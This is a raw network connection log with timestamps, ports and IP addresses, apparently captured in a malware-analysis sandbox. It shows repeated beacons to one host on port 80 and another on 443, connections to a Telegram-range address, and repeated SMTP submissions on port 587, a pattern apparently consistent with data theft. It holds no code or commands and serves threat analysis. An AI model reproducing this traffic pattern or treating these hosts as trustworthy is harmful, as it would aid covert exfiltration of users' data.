                                                                          Sep 19, 2024 12:21:19.077233076 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:19.082222939 CEST8049719132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:19.287348032 CEST8049719132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:19.338020086 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:19.356585979 CEST49722443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:19.356688976 CEST44349722188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:19.356931925 CEST49722443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:19.362106085 CEST49722443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:19.362143993 CEST44349722188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:19.563760996 CEST8049719132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:19.563858986 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:19.570703983 CEST44349721188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:19.572628975 CEST49721443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:19.572715998 CEST44349721188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:19.697506905 CEST44349721188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:19.697732925 CEST44349721188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:19.697823048 CEST49721443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:19.698390007 CEST49721443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:19.718041897 CEST4972080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:19.723598003 CEST8049720132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:19.723709106 CEST4972080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:19.729265928 CEST49724443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:19.729357004 CEST44349724149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:19.729443073 CEST49724443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:19.729983091 CEST49724443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:19.730019093 CEST44349724149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:20.036699057 CEST44349722188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:20.036819935 CEST49722443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:20.038865089 CEST49722443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:20.038892984 CEST44349722188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:20.039576054 CEST44349722188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:20.088009119 CEST49722443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:20.104931116 CEST49722443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:20.147440910 CEST44349722188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:20.216320992 CEST44349722188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:20.216461897 CEST44349722188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:20.216556072 CEST49722443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:20.220124006 CEST49722443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:20.224432945 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:20.229743004 CEST8049719132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:20.385214090 CEST44349724149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:20.385293961 CEST49724443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:20.387558937 CEST49724443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:20.387573004 CEST44349724149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:20.387801886 CEST44349724149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:20.391854048 CEST49724443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:20.434741020 CEST8049719132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:20.437175989 CEST49726443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:20.437247992 CEST44349726188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:20.437347889 CEST49726443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:20.437660933 CEST49726443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:20.437694073 CEST44349726188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:20.439424038 CEST44349724149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:20.478699923 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:20.631978989 CEST44349724149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:20.632035971 CEST44349724149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:20.632096052 CEST49724443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:20.641865969 CEST49724443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:21.798454046 CEST44349726188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:21.800815105 CEST49726443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:21.800848007 CEST44349726188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:21.955672026 CEST44349726188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:21.955899000 CEST44349726188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:21.956089020 CEST49726443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:21.956396103 CEST49726443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:21.959039927 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:21.960311890 CEST4972880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:21.964306116 CEST8049719132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:21.964462996 CEST4971980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:21.965209007 CEST8049728132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:21.965290070 CEST4972880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:21.965411901 CEST4972880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:21.970175028 CEST8049728132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:23.019723892 CEST8049728132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:23.019907951 CEST8049728132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:23.019968987 CEST4972880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:23.021212101 CEST49729443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:23.021269083 CEST44349729188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:23.021433115 CEST49729443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:23.021692991 CEST49729443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:23.021723032 CEST44349729188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:23.510236979 CEST44349729188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:23.512058973 CEST49729443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:23.512115002 CEST44349729188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:23.660641909 CEST44349729188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:23.660722017 CEST44349729188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:23.661003113 CEST49729443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:23.661628962 CEST49729443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:23.667190075 CEST4973280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:23.673557043 CEST8049732132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:23.673723936 CEST4973280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:23.673831940 CEST4973280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:23.678637981 CEST8049732132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:24.361613989 CEST8049732132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:24.363497972 CEST49733443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:24.363538027 CEST44349733188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:24.363658905 CEST49733443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:24.364042044 CEST49733443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:24.364061117 CEST44349733188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:24.416220903 CEST4973280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:24.840174913 CEST44349733188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:24.850300074 CEST49733443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:24.850343943 CEST44349733188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:24.989567995 CEST44349733188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:24.989793062 CEST44349733188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:24.989850044 CEST49733443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:24.990147114 CEST49733443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:24.993351936 CEST4973280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:24.994522095 CEST4973480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:24.998771906 CEST8049732132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:24.998857021 CEST4973280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:24.999423981 CEST8049734132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:24.999511957 CEST4973480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:24.999561071 CEST4973480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:25.004360914 CEST8049734132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:25.693104982 CEST8049734132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:25.695278883 CEST49735443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:25.695324898 CEST44349735188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:25.695631027 CEST49735443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:25.695980072 CEST49735443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:25.696017981 CEST44349735188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:25.744267941 CEST4973480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:25.843488932 CEST4970980192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:26.182627916 CEST44349735188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:26.184525013 CEST49735443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:26.184562922 CEST44349735188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:26.310863018 CEST44349735188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:26.310952902 CEST44349735188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:26.311021090 CEST49735443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:26.311722040 CEST49735443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:26.315459967 CEST4973480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:26.316658974 CEST4973680192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:26.320708036 CEST8049734132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:26.320790052 CEST4973480192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:26.321600914 CEST8049736132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:26.321686029 CEST4973680192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:26.321783066 CEST4973680192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:26.326606035 CEST8049736132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:26.987364054 CEST8049736132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:26.989165068 CEST49737443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:26.989268064 CEST44349737188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:26.989372969 CEST49737443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:26.989625931 CEST49737443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:26.989650011 CEST44349737188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:27.041163921 CEST4973680192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:27.475860119 CEST44349737188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:27.477965117 CEST49737443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:27.478043079 CEST44349737188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:27.629358053 CEST44349737188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:27.629594088 CEST44349737188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:27.629803896 CEST49737443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:27.630424976 CEST49737443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:27.634592056 CEST4973680192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:27.635993958 CEST4973880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:27.640039921 CEST8049736132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:27.640126944 CEST4973680192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:27.640901089 CEST8049738132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:27.640980005 CEST4973880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:27.641232014 CEST4973880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:27.646434069 CEST8049738132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:28.314029932 CEST8049738132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:28.316930056 CEST49739443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:28.316978931 CEST44349739188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:28.317156076 CEST49739443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:28.317542076 CEST49739443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:28.317562103 CEST44349739188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:28.369297028 CEST4973880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:28.777781963 CEST44349739188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:28.779372931 CEST49739443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:28.779396057 CEST44349739188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:28.933456898 CEST44349739188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:28.933726072 CEST44349739188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:28.933798075 CEST49739443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:28.937931061 CEST49739443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:28.940872908 CEST4973880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:28.941936970 CEST4974080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:28.946054935 CEST8049738132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:28.946227074 CEST4973880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:28.946866989 CEST8049740132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:28.946954012 CEST4974080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:28.947068930 CEST4974080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:28.951899052 CEST8049740132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:29.621263027 CEST8049740132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:29.623362064 CEST49741443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:29.623424053 CEST44349741188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:29.623487949 CEST49741443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:29.624000072 CEST49741443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:29.624013901 CEST44349741188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:29.666120052 CEST4974080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:30.094866991 CEST44349741188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:30.096692085 CEST49741443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:30.096734047 CEST44349741188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:30.247060061 CEST44349741188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:30.247173071 CEST44349741188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:30.247241974 CEST49741443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:30.247883081 CEST49741443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:30.251425982 CEST4974080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:30.252839088 CEST4974280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:30.256496906 CEST8049740132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:30.256578922 CEST4974080192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:30.257910967 CEST8049742132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:30.257992983 CEST4974280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:30.258122921 CEST4974280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:30.262897968 CEST8049742132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:30.941971064 CEST8049742132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:30.943892002 CEST49743443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:30.943936110 CEST44349743188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:30.944029093 CEST49743443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:30.944324970 CEST49743443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:30.944344044 CEST44349743188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:30.994340897 CEST4974280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:31.405523062 CEST44349743188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:31.407099962 CEST49743443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:31.407125950 CEST44349743188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:31.541224003 CEST44349743188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:31.541448116 CEST44349743188.114.97.3192.168.2.5
                                                                          Sep 19, 2024 12:21:31.541642904 CEST49743443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:31.541985989 CEST49743443192.168.2.5188.114.97.3
                                                                          Sep 19, 2024 12:21:31.551016092 CEST4974280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:31.551899910 CEST49744443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:31.551954985 CEST44349744149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:31.552035093 CEST49744443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:31.552434921 CEST49744443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:31.552452087 CEST44349744149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:31.556333065 CEST8049742132.226.247.73192.168.2.5
                                                                          Sep 19, 2024 12:21:31.556422949 CEST4974280192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:32.162729979 CEST44349744149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:32.162839890 CEST49744443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:32.164639950 CEST49744443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:32.164649010 CEST44349744149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:32.164969921 CEST44349744149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:32.166380882 CEST49744443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:32.211390972 CEST44349744149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:32.341511011 CEST44349744149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:32.341644049 CEST44349744149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:32.341710091 CEST49744443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:32.344655991 CEST49744443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:35.156666994 CEST49745587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:35.162122011 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:35.162220955 CEST49745587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:35.890657902 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:35.890930891 CEST49745587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:35.895828009 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:36.051333904 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:36.052361965 CEST49745587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:36.057282925 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:36.216126919 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:36.216490984 CEST49745587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:36.221395969 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:37.475754023 CEST4972880192.168.2.5132.226.247.73
                                                                          Sep 19, 2024 12:21:38.430066109 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:38.430318117 CEST49745587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:38.436453104 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:38.593972921 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:38.594217062 CEST49745587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:38.599428892 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:38.775335073 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:38.782454014 CEST49745587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:38.788278103 CEST61513443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:38.788316965 CEST44361513149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:38.788388014 CEST61513443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:38.788755894 CEST61513443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:38.788778067 CEST44361513149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:38.793843985 CEST58749745208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:38.793905973 CEST49745587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:39.425574064 CEST44361513149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:39.436253071 CEST61513443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:39.436275959 CEST44361513149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:39.436482906 CEST61513443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:39.436494112 CEST44361513149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:39.729399920 CEST44361513149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:39.729595900 CEST44361513149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:39.729654074 CEST61513443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:39.730047941 CEST61513443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:39.743961096 CEST61514587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:39.748905897 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:39.749003887 CEST61514587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:40.297022104 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:40.297228098 CEST61514587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:40.302243948 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:40.451419115 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:40.451834917 CEST61514587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:40.460227013 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:40.612756014 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:40.613291979 CEST61514587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:40.618570089 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:42.436367035 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:42.440330029 CEST61514587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:42.445719004 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:42.599111080 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:42.623491049 CEST61514587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:42.628622055 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:42.814090014 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:42.818680048 CEST61514587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:42.824038029 CEST58761514208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:42.824115038 CEST61514587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:42.834939957 CEST61517443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:42.835007906 CEST44361517149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:42.835103989 CEST61517443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:42.835505962 CEST61517443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:42.835529089 CEST44361517149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:43.467489958 CEST44361517149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:43.469631910 CEST61517443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:43.469659090 CEST44361517149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:43.469822884 CEST61517443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:43.469831944 CEST44361517149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:43.795079947 CEST44361517149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:43.795273066 CEST44361517149.154.167.220192.168.2.5
                                                                          Sep 19, 2024 12:21:43.795523882 CEST61517443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:43.795888901 CEST61517443192.168.2.5149.154.167.220
                                                                          Sep 19, 2024 12:21:43.797128916 CEST61518587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:43.802201033 CEST58761518208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:43.802314043 CEST61518587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:44.364861965 CEST58761518208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:44.365026951 CEST61518587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:44.369981050 CEST58761518208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:44.523714066 CEST58761518208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:44.523896933 CEST61518587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:44.528932095 CEST58761518208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:44.698379040 CEST58761518208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:44.700069904 CEST61518587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:44.705101013 CEST58761518208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:46.572340012 CEST58761518208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:46.572945118 CEST61518587192.168.2.5208.91.199.223
                                                                          Sep 19, 2024 12:21:46.578267097 CEST58761518208.91.199.223192.168.2.5
                                                                          Sep 19, 2024 12:21:46.732367039 CEST58761518208.91.199.223192.168.2.5
